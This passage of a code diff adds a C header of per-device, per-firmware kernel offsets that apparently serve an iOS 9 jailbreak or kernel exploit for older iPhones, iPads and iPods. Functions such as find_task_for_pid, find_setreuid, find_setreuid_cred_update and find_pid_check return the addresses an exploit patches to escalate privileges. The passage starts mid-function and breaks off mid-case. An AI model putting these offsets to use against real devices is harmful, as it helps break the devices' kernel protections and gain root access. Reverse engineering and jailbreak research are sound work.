0xbb760; + case iPhone41_iOS930: return 0xbc250; + case iPhone41_iOS931: return 0xbc250; + case iPhone41_iOS932: return 0xbc260; + case iPhone41_iOS933: return 0xbc1d4; + case iPhone41_iOS934: return 0xbc1d4; + case iPhone51_iOS910: return 0xbf770; + case iPhone51_iOS920: return 0xbe598; + case iPhone51_iOS921: return 0xbe5d8; + case iPhone51_iOS930: return 0xbf284; + case iPhone51_iOS931: return 0xbf284; + case iPhone51_iOS932: return 0xbf274; + case iPhone51_iOS933: return 0xbf404; + case iPhone51_iOS934: return 0xbf404; + case iPhone52_iOS902: return 0xbf5ac; + case iPhone52_iOS910: return 0xbf770; + case iPhone52_iOS920: return 0xbe598; + case iPhone52_iOS921: return 0xbe610; + case iPhone52_iOS930: return 0xbf2bc; + case iPhone52_iOS931: return 0xbf284; + case iPhone52_iOS932: return 0xbf284; + case iPhone52_iOS933: return 0xbf404; + case iPhone52_iOS934: return 0xbf404; + case iPhone53_iOS910: return 0xbf770; + case iPhone53_iOS920: return 0xbe598; + case iPhone53_iOS921: return 0xbe610; + case iPhone53_iOS930: return 0xbf284; + case iPhone53_iOS931: return 0xbf284; + case iPhone53_iOS932: return 0xbf274; + case iPhone53_iOS933: return 0xbf404; + case iPhone53_iOS934: return 0xbf404; + case iPhone54_iOS910: return 0xbf770; + case iPhone54_iOS920: return 0xbe598; + case iPhone54_iOS921: return 0xbe5d8; + case iPhone54_iOS930: return 0xbf284; + case iPhone54_iOS931: return 0xbf284; + case iPhone54_iOS932: return 0xbf274; + case iPhone54_iOS933: return 0xbf404; + case iPhone54_iOS934: return 0xbf404; + case iPad21_iOS910: return 0xbcb7c; + case iPad21_iOS920: return 0xbb710; + case iPad21_iOS921: return 0xbb760; + case iPad21_iOS930: return 0xbc250; + case iPad21_iOS931: return 0xbc250; + case iPad21_iOS932: return 0xbc260; + case iPad21_iOS933: return 0xbc1d4; + case iPad21_iOS934: return 0xbc1d4; + case iPad22_iOS910: return 0xbcb7c; + case iPad22_iOS920: return 0xbb710; + case iPad22_iOS921: return 0xbb760; + case iPad22_iOS930: return 0xbc250; + case iPad22_iOS931: return 0xbc250; + case iPad22_iOS932: return 0xbc260; + case iPad22_iOS933: return 0xbc1d4; + case iPad22_iOS934: return 0xbc1d4; + case iPad23_iOS910: return 0xbcb7c; + case iPad23_iOS920: return 0xbb710; + case iPad23_iOS921: return 0xbb760; + case iPad23_iOS930: return 0xbc250; + case iPad23_iOS931: return 0xbc250; + case iPad23_iOS932: return 0xbc260; + case iPad23_iOS933: return 0xbc1d8; + case iPad23_iOS934: return 0xbc1d4; + case iPad24_iOS910: return 0xbcb7c; + case iPad24_iOS920: return 0xbb710; + case iPad24_iOS921: return 0xbb760; + case iPad24_iOS930: return 0xbc250; + case iPad24_iOS931: return 0xbc250; + case iPad24_iOS932: return 0xbc260; + case iPad24_iOS933: return 0xbc1d8; + case iPad24_iOS934: return 0xbc1d4; + case iPad25_iOS902: return 0xbc9b8; + case iPad31_iOS910: return 0xbcb7c; + case iPad31_iOS920: return 0xbb710; + case iPad31_iOS921: return 0xbb760; + case iPad31_iOS930: return 0xbc250; + case iPad31_iOS931: return 0xbc250; + case iPad31_iOS932: return 0xbc260; + case iPad31_iOS933: return 0xbc1d4; + case iPad31_iOS934: return 0xbc1d4; + case iPad32_iOS910: return 0xbcb7c; + case iPad32_iOS920: return 0xbb710; + case iPad32_iOS921: return 0xbb760; + case iPad32_iOS930: return 0xbc250; + case iPad32_iOS931: return 0xbc250; + case iPad32_iOS932: return 0xbc260; + case iPad32_iOS933: return 0xbc1d4; + case iPad32_iOS934: return 0xbc1d4; + case iPad33_iOS902: return 0xbc9b8; + case iPad33_iOS910: return 0xbcb7c; + case iPad33_iOS920: return 0xbb710; + case iPad33_iOS921: return 0xbb760; + case iPad33_iOS930: return 0xbc250; + case iPad33_iOS931: return 0xbc250; + case iPad33_iOS932: return 0xbc260; + case iPad33_iOS933: return 0xbc1d4; + case iPad33_iOS934: return 0xbc1d4; + case iPad34_iOS910: return 0xbf770; + case iPad34_iOS920: return 0xbe598; + case iPad34_iOS921: return 0xbe5d8; + case iPad34_iOS930: return 0xbf284; + case iPad34_iOS931: return 0xbf284; + case iPad34_iOS932: return 0xbf274; + case iPad34_iOS933: return 0xbf404; + case iPad34_iOS934: return 0xbf404; + case iPad35_iOS910: return 0xbf770; + case iPad35_iOS920: return 0xbe598; + case iPad35_iOS921: return 0xbe5d8; + case iPad35_iOS930: return 0xbf284; + case iPad35_iOS931: return 0xbf284; + case iPad35_iOS932: return 0xbf274; + case iPad35_iOS933: return 0xbf404; + case iPad35_iOS934: return 0xbf404; + case iPad36_iOS910: return 0xbf770; + case iPad36_iOS920: return 0xbe598; + case iPad36_iOS921: return 0xbe5d8; + case iPad36_iOS930: return 0xbf284; + case iPad36_iOS931: return 0xbf284; + case iPad36_iOS932: return 0xbf274; + case iPad36_iOS933: return 0xbf404; + case iPad36_iOS934: return 0xbf404; + case iPod51_iOS910: return 0xbcb7c; + case iPod51_iOS920: return 0xbb710; + case iPod51_iOS921: return 0xbb760; + case iPod51_iOS930: return 0xbc250; + case iPod51_iOS931: return 0xbc250; + case iPod51_iOS932: return 0xbc260; + case iPod51_iOS933: return 0xbc1d4; + case iPod51_iOS934: return 0xbc1d4; + default: return 0; + } +} + +static inline unsigned int find_invalidate_tlb(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0xc74e0; + case iPhone41_iOS910: return 0xc74e0; + case iPhone41_iOS920: return 0xc64e0; + case iPhone41_iOS921: return 0xc64e0; + case iPhone41_iOS930: return 0xc7440; + case iPhone41_iOS931: return 0xc7440; + case iPhone41_iOS932: return 0xc7440; + case iPhone41_iOS933: return 0xc7440; + case iPhone41_iOS934: return 0xc7440; + case iPhone51_iOS910: return 0xcb600; + case iPhone51_iOS920: return 0xca600; + case iPhone51_iOS921: return 0xca600; + case iPhone51_iOS930: return 0xcb560; + case iPhone51_iOS931: return 0xcb560; + case iPhone51_iOS932: return 0xcb560; + case iPhone51_iOS933: return 0xcb560; + case iPhone51_iOS934: return 0xcb560; + case iPhone52_iOS902: return 0xcb600; + case iPhone52_iOS910: return 0xcb600; + case iPhone52_iOS920: return 0xca600; + case iPhone52_iOS921: return 0xca600; + case iPhone52_iOS930: return 0xcb560; + case iPhone52_iOS931: return 0xcb560; + case iPhone52_iOS932: return 0xcb560; + case iPhone52_iOS933: return 0xcb560; + case iPhone52_iOS934: return 0xcb560; + case iPhone53_iOS910: return 0xcb600; + case iPhone53_iOS920: return 0xca600; + case iPhone53_iOS921: return 0xca600; + case iPhone53_iOS930: return 0xcb560; + case iPhone53_iOS931: return 0xcb560; + case iPhone53_iOS932: return 0xcb560; + case iPhone53_iOS933: return 0xcb560; + case iPhone53_iOS934: return 0xcb560; + case iPhone54_iOS910: return 0xcb600; + case iPhone54_iOS920: return 0xca600; + case iPhone54_iOS921: return 0xca600; + case iPhone54_iOS930: return 0xcb560; + case iPhone54_iOS931: return 0xcb560; + case iPhone54_iOS932: return 0xcb560; + case iPhone54_iOS933: return 0xcb560; + case iPhone54_iOS934: return 0xcb560; + case iPad21_iOS910: return 0xc74e0; + case iPad21_iOS920: return 0xc64e0; + case iPad21_iOS921: return 0xc64e0; + case iPad21_iOS930: return 0xc7440; + case iPad21_iOS931: return 0xc7440; + case iPad21_iOS932: return 0xc7440; + case iPad21_iOS933: return 0xc7440; + case iPad21_iOS934: return 0xc7440; + case iPad22_iOS910: return 0xc74e0; + case iPad22_iOS920: return 0xc64e0; + case iPad22_iOS921: return 0xc64e0; + case iPad22_iOS930: return 0xc7440; + case iPad22_iOS931: return 0xc7440; + case iPad22_iOS932: return 0xc7440; + case iPad22_iOS933: return 0xc7440; + case iPad22_iOS934: return 0xc7440; + case iPad23_iOS910: return 0xc74e0; + case iPad23_iOS920: return 0xc64e0; + case iPad23_iOS921: return 0xc64e0; + case iPad23_iOS930: return 0xc7440; + case iPad23_iOS931: return 0xc7440; + case iPad23_iOS932: return 0xc7440; + case iPad23_iOS933: return 0xc7450; + case iPad23_iOS934: return 0xc7440; + case iPad24_iOS910: return 0xc74e0; + case iPad24_iOS920: return 0xc64e0; + case iPad24_iOS921: return 0xc64e0; + case iPad24_iOS930: return 0xc7440; + case iPad24_iOS931: return 0xc7440; + case iPad24_iOS932: return 0xc7440; + case iPad24_iOS933: return 0xc7450; + case iPad24_iOS934: return 0xc7440; + case iPad25_iOS902: return 0xc74e0; + case iPad31_iOS910: return 0xc74e0; + case iPad31_iOS920: return 0xc64e0; + case iPad31_iOS921: return 0xc64e0; + case iPad31_iOS930: return 0xc7440; + case iPad31_iOS931: return 0xc7440; + case iPad31_iOS932: return 0xc7440; + case iPad31_iOS933: return 0xc7440; + case iPad31_iOS934: return 0xc7440; + case iPad32_iOS910: return 0xc74e0; + case iPad32_iOS920: return 0xc64e0; + case iPad32_iOS921: return 0xc64e0; + case iPad32_iOS930: return 0xc7440; + case iPad32_iOS931: return 0xc7440; + case iPad32_iOS932: return 0xc7440; + case iPad32_iOS933: return 0xc7440; + case iPad32_iOS934: return 0xc7440; + case iPad33_iOS902: return 0xc74e0; + case iPad33_iOS910: return 0xc74e0; + case iPad33_iOS920: return 0xc64e0; + case iPad33_iOS921: return 0xc64e0; + case iPad33_iOS930: return 0xc7440; + case iPad33_iOS931: return 0xc7440; + case iPad33_iOS932: return 0xc7440; + case iPad33_iOS933: return 0xc7440; + case iPad33_iOS934: return 0xc7440; + case iPad34_iOS910: return 0xcb600; + case iPad34_iOS920: return 0xca600; + case iPad34_iOS921: return 0xca600; + case iPad34_iOS930: return 0xcb560; + case iPad34_iOS931: return 0xcb560; + case iPad34_iOS932: return 0xcb560; + case iPad34_iOS933: return 0xcb560; + case iPad34_iOS934: return 0xcb560; + case iPad35_iOS910: return 0xcb600; + case iPad35_iOS920: return 0xca600; + case iPad35_iOS921: return 0xca600; + case iPad35_iOS930: return 0xcb560; + case iPad35_iOS931: return 0xcb560; + case iPad35_iOS932: return 0xcb560; + case iPad35_iOS933: return 0xcb560; + case iPad35_iOS934: return 0xcb560; + case iPad36_iOS910: return 0xcb600; + case iPad36_iOS920: return 0xca600; + case iPad36_iOS921: return 0xca600; + case iPad36_iOS930: return 0xcb560; + case iPad36_iOS931: return 0xcb560; + case iPad36_iOS932: return 0xcb560; + case iPad36_iOS933: return 0xcb560; + case iPad36_iOS934: return 0xcb560; + case iPod51_iOS910: return 0xc74e0; + case iPod51_iOS920: return 0xc64e0; + case iPod51_iOS921: return 0xc64e0; + case iPod51_iOS930: return 0xc7440; + case iPod51_iOS931: return 0xc7440; + case iPod51_iOS932: return 0xc7440; + case iPod51_iOS933: return 0xc7440; + case iPod51_iOS934: return 0xc7440; + default: return 0; + } +} + +static inline unsigned int find_task_for_pid(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x2fca70; + case iPhone41_iOS910: return 0x2fe034; + case iPhone41_iOS920: return 0x2f55b4; + case iPhone41_iOS921: return 0x2f56c4; + case iPhone41_iOS930: return 0x2fcc8c; + case iPhone41_iOS931: return 0x2fcc8c; + case iPhone41_iOS932: return 0x2fcd80; + case iPhone41_iOS933: return 0x2fcec0; + case iPhone41_iOS934: return 0x2fcec0; + case iPhone51_iOS910: return 0x3040a4; + case iPhone51_iOS920: return 0x2fbb8c; + case iPhone51_iOS921: return 0x2fbc9c; + case iPhone51_iOS930: return 0x302e3c; + case iPhone51_iOS931: return 0x302e3c; + case iPhone51_iOS932: return 0x302df0; + case iPhone51_iOS933: return 0x302fd4; + case iPhone51_iOS934: return 0x302fd4; + case iPhone52_iOS902: return 0x302bdc; + case iPhone52_iOS910: return 0x3040a4; + case iPhone52_iOS920: return 0x2fbb8c; + case iPhone52_iOS921: return 0x2fbc9c; + case iPhone52_iOS930: return 0x302e3c; + case iPhone52_iOS931: return 0x302e3c; + case iPhone52_iOS932: return 0x302df0; + case iPhone52_iOS933: return 0x302fd4; + case iPhone52_iOS934: return 0x302fd4; + case iPhone53_iOS910: return 0x3040a4; + case iPhone53_iOS920: return 0x2fbb8c; + case iPhone53_iOS921: return 0x2fbc9c; + case iPhone53_iOS930: return 0x302e3c; + case iPhone53_iOS931: return 0x302e3c; + case iPhone53_iOS932: return 0x302df0; + case iPhone53_iOS933: return 0x302fd4; + case iPhone53_iOS934: return 0x302fd4; + case iPhone54_iOS910: return 0x3040a4; + case iPhone54_iOS920: return 0x2fbb8c; + case iPhone54_iOS921: return 0x2fbc9c; + case iPhone54_iOS930: return 0x302e3c; + case iPhone54_iOS931: return 0x302e3c; + case iPhone54_iOS932: return 0x302df0; + case iPhone54_iOS933: return 0x302fd4; + case iPhone54_iOS934: return 0x302fd4; + case iPad21_iOS910: return 0x2fe034; + case iPad21_iOS920: return 0x2f55b4; + case iPad21_iOS921: return 0x2f56c4; + case iPad21_iOS930: return 0x2fcc8c; + case iPad21_iOS931: return 0x2fcc8c; + case iPad21_iOS932: return 0x2fcd80; + case iPad21_iOS933: return 0x2fcec0; + case iPad21_iOS934: return 0x2fcec0; + case iPad22_iOS910: return 0x2fe034; + case iPad22_iOS920: return 0x2f55b4; + case iPad22_iOS921: return 0x2f56c4; + case iPad22_iOS930: return 0x2fcc8c; + case iPad22_iOS931: return 0x2fcc8c; + case iPad22_iOS932: return 0x2fcd80; + case iPad22_iOS933: return 0x2fcec0; + case iPad22_iOS934: return 0x2fcec0; + case iPad23_iOS910: return 0x2fe034; + case iPad23_iOS920: return 0x2f55b4; + case iPad23_iOS921: return 0x2f56c4; + case iPad23_iOS930: return 0x2fcc8c; + case iPad23_iOS931: return 0x2fcc8c; + case iPad23_iOS932: return 0x2fcd80; + case iPad23_iOS933: return 0x2fcec0; + case iPad23_iOS934: return 0x2fcec0; + case iPad24_iOS910: return 0x2fe034; + case iPad24_iOS920: return 0x2f55b4; + case iPad24_iOS921: return 0x2f56c4; + case iPad24_iOS930: return 0x2fcc8c; + case iPad24_iOS931: return 0x2fcc8c; + case iPad24_iOS932: return 0x2fcd80; + case iPad24_iOS933: return 0x2fcec0; + case iPad24_iOS934: return 0x2fcec0; + case iPad25_iOS902: return 0x2fca70; + case iPad31_iOS910: return 0x2fe034; + case iPad31_iOS920: return 0x2f55b4; + case iPad31_iOS921: return 0x2f56c4; + case iPad31_iOS930: return 0x2fcc8c; + case iPad31_iOS931: return 0x2fcc8c; + case iPad31_iOS932: return 0x2fcd80; + case iPad31_iOS933: return 0x2fcec0; + case iPad31_iOS934: return 0x2fcec0; + case iPad32_iOS910: return 0x2fe034; + case iPad32_iOS920: return 0x2f55b4; + case iPad32_iOS921: return 0x2f56c4; + case iPad32_iOS930: return 0x2fcc8c; + case iPad32_iOS931: return 0x2fcc8c; + case iPad32_iOS932: return 0x2fcd80; + case iPad32_iOS933: return 0x2fcec0; + case iPad32_iOS934: return 0x2fcec0; + case iPad33_iOS902: return 0x2fca70; + case iPad33_iOS910: return 0x2fe034; + case iPad33_iOS920: return 0x2f55b4; + case iPad33_iOS921: return 0x2f56c4; + case iPad33_iOS930: return 0x2fcc8c; + case iPad33_iOS931: return 0x2fcc8c; + case iPad33_iOS932: return 0x2fcd80; + case iPad33_iOS933: return 0x2fcec0; + case iPad33_iOS934: return 0x2fcec0; + case iPad34_iOS910: return 0x3040a4; + case iPad34_iOS920: return 0x2fbb8c; + case iPad34_iOS921: return 0x2fbc9c; + case iPad34_iOS930: return 0x302e3c; + case iPad34_iOS931: return 0x302e3c; + case iPad34_iOS932: return 0x302df0; + case iPad34_iOS933: return 0x302fd4; + case iPad34_iOS934: return 0x302fd4; + case iPad35_iOS910: return 0x3040a4; + case iPad35_iOS920: return 0x2fbb8c; + case iPad35_iOS921: return 0x2fbc9c; + case iPad35_iOS930: return 0x302e3c; + case iPad35_iOS931: return 0x302e3c; + case iPad35_iOS932: return 0x302df0; + case iPad35_iOS933: return 0x302fd4; + case iPad35_iOS934: return 0x302fd4; + case iPad36_iOS910: return 0x3040a4; + case iPad36_iOS920: return 0x2fbb8c; + case iPad36_iOS921: return 0x2fbc9c; + case iPad36_iOS930: return 0x302e3c; + case iPad36_iOS931: return 0x302e3c; + case iPad36_iOS932: return 0x302df0; + case iPad36_iOS933: return 0x302fd4; + case iPad36_iOS934: return 0x302fd4; + case iPod51_iOS910: return 0x2fe034; + case iPod51_iOS920: return 0x2f55b4; + case iPod51_iOS921: return 0x2f56c4; + case iPod51_iOS930: return 0x2fcc8c; + case iPod51_iOS931: return 0x2fcc8c; + case iPod51_iOS932: return 0x2fcd80; + case iPod51_iOS933: return 0x2fcec0; + case iPod51_iOS934: return 0x2fcec0; + default: return 0; + } +} + +static inline unsigned int find_setreuid(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x2a9754; + case iPhone41_iOS910: return 0x2aa31c; + case iPhone41_iOS920: return 0x2a3ab4; + case iPhone41_iOS921: return 0x2a3bc4; + case iPhone41_iOS930: return 0x2a977c; + case iPhone41_iOS931: return 0x2a977c; + case iPhone41_iOS932: return 0x2a985c; + case iPhone41_iOS933: return 0x2a9988; + case iPhone41_iOS934: return 0x2a9988; + case iPhone51_iOS910: return 0x2b00f0; + case iPhone51_iOS920: return 0x2a9e24; + case iPhone51_iOS921: return 0x2a9f34; + case iPhone51_iOS930: return 0x2af658; + case iPhone51_iOS931: return 0x2af658; + case iPhone51_iOS932: return 0x2af5f8; + case iPhone51_iOS933: return 0x2af7b8; + case iPhone51_iOS934: return 0x2af7b8; + case iPhone52_iOS902: return 0x2af674; + case iPhone52_iOS910: return 0x2b00f0; + case iPhone52_iOS920: return 0x2a9e24; + case iPhone52_iOS921: return 0x2a9f34; + case iPhone52_iOS930: return 0x2af658; + case iPhone52_iOS931: return 0x2af658; + case iPhone52_iOS932: return 0x2af5f8; + case iPhone52_iOS933: return 0x2af7b8; + case iPhone52_iOS934: return 0x2af7b8; + case iPhone53_iOS910: return 0x2b00f0; + case iPhone53_iOS920: return 0x2a9e24; + case iPhone53_iOS921: return 0x2a9f34; + case iPhone53_iOS930: return 0x2af658; + case iPhone53_iOS931: return 0x2af658; + case iPhone53_iOS932: return 0x2af5f8; + case iPhone53_iOS933: return 0x2af7b8; + case iPhone53_iOS934: return 0x2af7b8; + case iPhone54_iOS910: return 0x2b00f0; + case iPhone54_iOS920: return 0x2a9e24; + case iPhone54_iOS921: return 0x2a9f34; + case iPhone54_iOS930: return 0x2af658; + case iPhone54_iOS931: return 0x2af658; + case iPhone54_iOS932: return 0x2af5f8; + case iPhone54_iOS933: return 0x2af7b8; + case iPhone54_iOS934: return 0x2af7b8; + case iPad21_iOS910: return 0x2aa31c; + case iPad21_iOS920: return 0x2a3ab4; + case iPad21_iOS921: return 0x2a3bc4; + case iPad21_iOS930: return 0x2a977c; + case iPad21_iOS931: return 0x2a977c; + case iPad21_iOS932: return 0x2a985c; + case iPad21_iOS933: return 0x2a9988; + case iPad21_iOS934: return 0x2a9988; + case iPad22_iOS910: return 0x2aa31c; + case iPad22_iOS920: return 0x2a3ab4; + case iPad22_iOS921: return 0x2a3bc4; + case iPad22_iOS930: return 0x2a977c; + case iPad22_iOS931: return 0x2a977c; + case iPad22_iOS932: return 0x2a985c; + case iPad22_iOS933: return 0x2a9988; + case iPad22_iOS934: return 0x2a9988; + case iPad23_iOS910: return 0x2aa31c; + case iPad23_iOS920: return 0x2a3ab4; + case iPad23_iOS921: return 0x2a3bc4; + case iPad23_iOS930: return 0x2a977c; + case iPad23_iOS931: return 0x2a977c; + case iPad23_iOS932: return 0x2a985c; + case iPad23_iOS933: return 0x2a9988; + case iPad23_iOS934: return 0x2a9988; + case iPad24_iOS910: return 0x2aa31c; + case iPad24_iOS920: return 0x2a3ab4; + case iPad24_iOS921: return 0x2a3bc4; + case iPad24_iOS930: return 0x2a977c; + case iPad24_iOS931: return 0x2a977c; + case iPad24_iOS932: return 0x2a985c; + case iPad24_iOS933: return 0x2a9988; + case iPad24_iOS934: return 0x2a9988; + case iPad25_iOS902: return 0x2a9754; + case iPad31_iOS910: return 0x2aa31c; + case iPad31_iOS920: return 0x2a3ab4; + case iPad31_iOS921: return 0x2a3bc4; + case iPad31_iOS930: return 0x2a977c; + case iPad31_iOS931: return 0x2a977c; + case iPad31_iOS932: return 0x2a985c; + case iPad31_iOS933: return 0x2a9988; + case iPad31_iOS934: return 0x2a9988; + case iPad32_iOS910: return 0x2aa31c; + case iPad32_iOS920: return 0x2a3ab4; + case iPad32_iOS921: return 0x2a3bc4; + case iPad32_iOS930: return 0x2a977c; + case iPad32_iOS931: return 0x2a977c; + case iPad32_iOS932: return 0x2a985c; + case iPad32_iOS933: return 0x2a9988; + case iPad32_iOS934: return 0x2a9988; + case iPad33_iOS902: return 0x2a9754; + case iPad33_iOS910: return 0x2aa31c; + case iPad33_iOS920: return 0x2a3ab4; + case iPad33_iOS921: return 0x2a3bc4; + case iPad33_iOS930: return 0x2a977c; + case iPad33_iOS931: return 0x2a977c; + case iPad33_iOS932: return 0x2a985c; + case iPad33_iOS933: return 0x2a9988; + case iPad33_iOS934: return 0x2a9988; + case iPad34_iOS910: return 0x2b00f0; + case iPad34_iOS920: return 0x2a9e24; + case iPad34_iOS921: return 0x2a9f34; + case iPad34_iOS930: return 0x2af658; + case iPad34_iOS931: return 0x2af658; + case iPad34_iOS932: return 0x2af5f8; + case iPad34_iOS933: return 0x2af7b8; + case iPad34_iOS934: return 0x2af7b8; + case iPad35_iOS910: return 0x2b00f0; + case iPad35_iOS920: return 0x2a9e24; + case iPad35_iOS921: return 0x2a9f34; + case iPad35_iOS930: return 0x2af658; + case iPad35_iOS931: return 0x2af658; + case iPad35_iOS932: return 0x2af5f8; + case iPad35_iOS933: return 0x2af7b8; + case iPad35_iOS934: return 0x2af7b8; + case iPad36_iOS910: return 0x2b00f0; + case iPad36_iOS920: return 0x2a9e24; + case iPad36_iOS921: return 0x2a9f34; + case iPad36_iOS930: return 0x2af658; + case iPad36_iOS931: return 0x2af658; + case iPad36_iOS932: return 0x2af5f8; + case iPad36_iOS933: return 0x2af7b8; + case iPad36_iOS934: return 0x2af7b8; + case iPod51_iOS910: return 0x2aa31c; + case iPod51_iOS920: return 0x2a3ab4; + case iPod51_iOS921: return 0x2a3bc4; + case iPod51_iOS930: return 0x2a977c; + case iPod51_iOS931: return 0x2a977c; + case iPod51_iOS932: return 0x2a985c; + case iPod51_iOS933: return 0x2a9988; + case iPod51_iOS934: return 0x2a9988; + default: return 0; + } +} + +static inline unsigned int find_setreuid_cred_update(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0xe040; + case iPhone41_iOS910: return 0xe031; + case iPhone41_iOS920: return 0xe031; + case iPhone41_iOS921: return 0xe031; + case iPhone41_iOS930: return 0xe031; + case iPhone41_iOS931: return 0xe031; + case iPhone41_iOS932: return 0xe031; + case iPhone41_iOS933: return 0xe031; + case iPhone41_iOS934: return 0xe031; + case iPhone51_iOS910: return 0xe031; + case iPhone51_iOS920: return 0xe031; + case iPhone51_iOS921: return 0xe031; + case iPhone51_iOS930: return 0xe031; + case iPhone51_iOS931: return 0xe031; + case iPhone51_iOS932: return 0xe031; + case iPhone51_iOS933: return 0xe031; + case iPhone51_iOS934: return 0xe031; + case iPhone52_iOS902: return 0xe042; + case iPhone52_iOS910: return 0xe031; + case iPhone52_iOS920: return 0xe031; + case iPhone52_iOS921: return 0xe031; + case iPhone52_iOS930: return 0xe031; + case iPhone52_iOS931: return 0xe031; + case iPhone52_iOS932: return 0xe031; + case iPhone52_iOS933: return 0xe031; + case iPhone52_iOS934: return 0xe031; + case iPhone53_iOS910: return 0xe031; + case iPhone53_iOS920: return 0xe031; + case iPhone53_iOS921: return 0xe031; + case iPhone53_iOS930: return 0xe031; + case iPhone53_iOS931: return 0xe031; + case iPhone53_iOS932: return 0xe031; + case iPhone53_iOS933: return 0xe031; + case iPhone53_iOS934: return 0xe031; + case iPhone54_iOS910: return 0xe031; + case iPhone54_iOS920: return 0xe031; + case iPhone54_iOS921: return 0xe031; + case iPhone54_iOS930: return 0xe031; + case iPhone54_iOS931: return 0xe031; + case iPhone54_iOS932: return 0xe031; + case iPhone54_iOS933: return 0xe031; + case iPhone54_iOS934: return 0xe031; + case iPad21_iOS910: return 0xe031; + case iPad21_iOS920: return 0xe031; + case iPad21_iOS921: return 0xe031; + case iPad21_iOS930: return 0xe031; + case iPad21_iOS931: return 0xe031; + case iPad21_iOS932: return 0xe031; + case iPad21_iOS933: return 0xe031; + case iPad21_iOS934: return 0xe031; + case iPad22_iOS910: return 0xe031; + case iPad22_iOS920: return 0xe031; + case iPad22_iOS921: return 0xe031; + case iPad22_iOS930: return 0xe031; + case iPad22_iOS931: return 0xe031; + case iPad22_iOS932: return 0xe031; + case iPad22_iOS933: return 0xe031; + case iPad22_iOS934: return 0xe031; + case iPad23_iOS910: return 0xe031; + case iPad23_iOS920: return 0xe031; + case iPad23_iOS921: return 0xe031; + case iPad23_iOS930: return 0xe031; + case iPad23_iOS931: return 0xe031; + case iPad23_iOS932: return 0xe031; + case iPad23_iOS933: return 0xe031; + case iPad23_iOS934: return 0xe031; + case iPad24_iOS910: return 0xe031; + case iPad24_iOS920: return 0xe031; + case iPad24_iOS921: return 0xe031; + case iPad24_iOS930: return 0xe031; + case iPad24_iOS931: return 0xe031; + case iPad24_iOS932: return 0xe031; + case iPad24_iOS933: return 0xe031; + case iPad24_iOS934: return 0xe031; + case iPad25_iOS902: return 0xe031; + case iPad31_iOS910: return 0xe031; + case iPad31_iOS920: return 0xe031; + case iPad31_iOS921: return 0xe031; + case iPad31_iOS930: return 0xe031; + case iPad31_iOS931: return 0xe031; + case iPad31_iOS932: return 0xe031; + case iPad31_iOS933: return 0xe031; + case iPad31_iOS934: return 0xe031; + case iPad32_iOS910: return 0xe031; + case iPad32_iOS920: return 0xe031; + case iPad32_iOS921: return 0xe031; + case iPad32_iOS930: return 0xe031; + case iPad32_iOS931: return 0xe031; + case iPad32_iOS932: return 0xe031; + case iPad32_iOS933: return 0xe031; + case iPad32_iOS934: return 0xe031; + case iPad33_iOS902: return 0xe031; + case iPad33_iOS910: return 0xe031; + case iPad33_iOS920: return 0xe031; + case iPad33_iOS921: return 0xe031; + case iPad33_iOS930: return 0xe031; + case iPad33_iOS931: return 0xe031; + case iPad33_iOS932: return 0xe031; + case iPad33_iOS933: return 0xe031; + case iPad33_iOS934: return 0xe031; + case iPad34_iOS910: return 0xe031; + case iPad34_iOS920: return 0xe031; + case iPad34_iOS921: return 0xe031; + case iPad34_iOS930: return 0xe031; + case iPad34_iOS931: return 0xe031; + case iPad34_iOS932: return 0xe031; + case iPad34_iOS933: return 0xe031; + case iPad34_iOS934: return 0xe031; + case iPad35_iOS910: return 0xe031; + case iPad35_iOS920: return 0xe031; + case iPad35_iOS921: return 0xe031; + case iPad35_iOS930: return 0xe031; + case iPad35_iOS931: return 0xe031; + case iPad35_iOS932: return 0xe031; + case iPad35_iOS933: return 0xe031; + case iPad35_iOS934: return 0xe031; + case iPad36_iOS910: return 0xe031; + case iPad36_iOS920: return 0xe031; + case iPad36_iOS921: return 0xe031; + case iPad36_iOS930: return 0xe031; + case iPad36_iOS931: return 0xe031; + case iPad36_iOS932: return 0xe031; + case iPad36_iOS933: return 0xe031; + case iPad36_iOS934: return 0xe031; + case iPod51_iOS910: return 0xe03e; + case iPod51_iOS920: return 0xe031; + case iPod51_iOS921: return 0xe031; + case iPod51_iOS930: return 0xe031; + case iPod51_iOS931: return 0xe031; + case iPod51_iOS932: return 0xe031; + case iPod51_iOS933: return 0xe031; + case iPod51_iOS934: return 0xe031; + default: return 0; + } +} + +static inline unsigned int find_pid_check(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x16; + case iPhone41_iOS910: return 0x14; + case iPhone41_iOS920: return 0x14; + case iPhone41_iOS921: return 0x14; + case iPhone41_iOS930: return 0x14; + case iPhone41_iOS931: return 0x14; + case iPhone41_iOS932: return 0x14; + case iPhone41_iOS933: return 0x14; + case iPhone41_iOS934: return 0x14; + case iPhone51_iOS910: return 0x16; + case iPhone51_iOS920: return 0x16; + case iPhone51_iOS921: return 0x16; + case iPhone51_iOS930: return 0x16; + case iPhone51_iOS931: return 0x16; + case iPhone51_iOS932: return 0x16; + case iPhone51_iOS933: return 0x16; + case iPhone51_iOS934: return 0x16; + case iPhone52_iOS902: return 0x18; + case iPhone52_iOS910: return 0x16; + case iPhone52_iOS920: return 0x16; + case iPhone52_iOS921: return 0x16; + case iPhone52_iOS930: return 0x16; + case iPhone52_iOS931: return 0x16; + case iPhone52_iOS932: return 0x16; + case iPhone52_iOS933: return 0x16; + case iPhone52_iOS934: return 0x16; + case iPhone53_iOS910: return 0x16; + case iPhone53_iOS920: return 0x16; + case iPhone53_iOS921: return 0x16; + case iPhone53_iOS930: return 0x16; + case iPhone53_iOS931: return 0x16; + case iPhone53_iOS932: return 0x16; + case iPhone53_iOS933: return 0x16; + case iPhone53_iOS934: return 0x16; + case iPhone54_iOS910: return 0x16; + case iPhone54_iOS920: return 0x16; + case iPhone54_iOS921: return 0x16; + case iPhone54_iOS930: return 0x16; + case iPhone54_iOS931: return 0x16; + case iPhone54_iOS932: return 0x16; + case iPhone54_iOS933: return 0x16; + case iPhone54_iOS934: return 0x16; + case iPad21_iOS910: return 0x16; + case iPad21_iOS920: return 0x14; + case iPad21_iOS921: return 0x14; + case iPad21_iOS930: return 0x14; + case iPad21_iOS931: return 0x14; + case iPad21_iOS932: return 0x14; + case iPad21_iOS933: return 0x14; + case iPad21_iOS934: return 0x14; + case iPad22_iOS910: return 0x16; + case iPad22_iOS920: return 0x14; + case iPad22_iOS921: return 0x14; + case iPad22_iOS930: return 0x14; + case iPad22_iOS931: return 0x14; + case iPad22_iOS932: return 0x14; + case 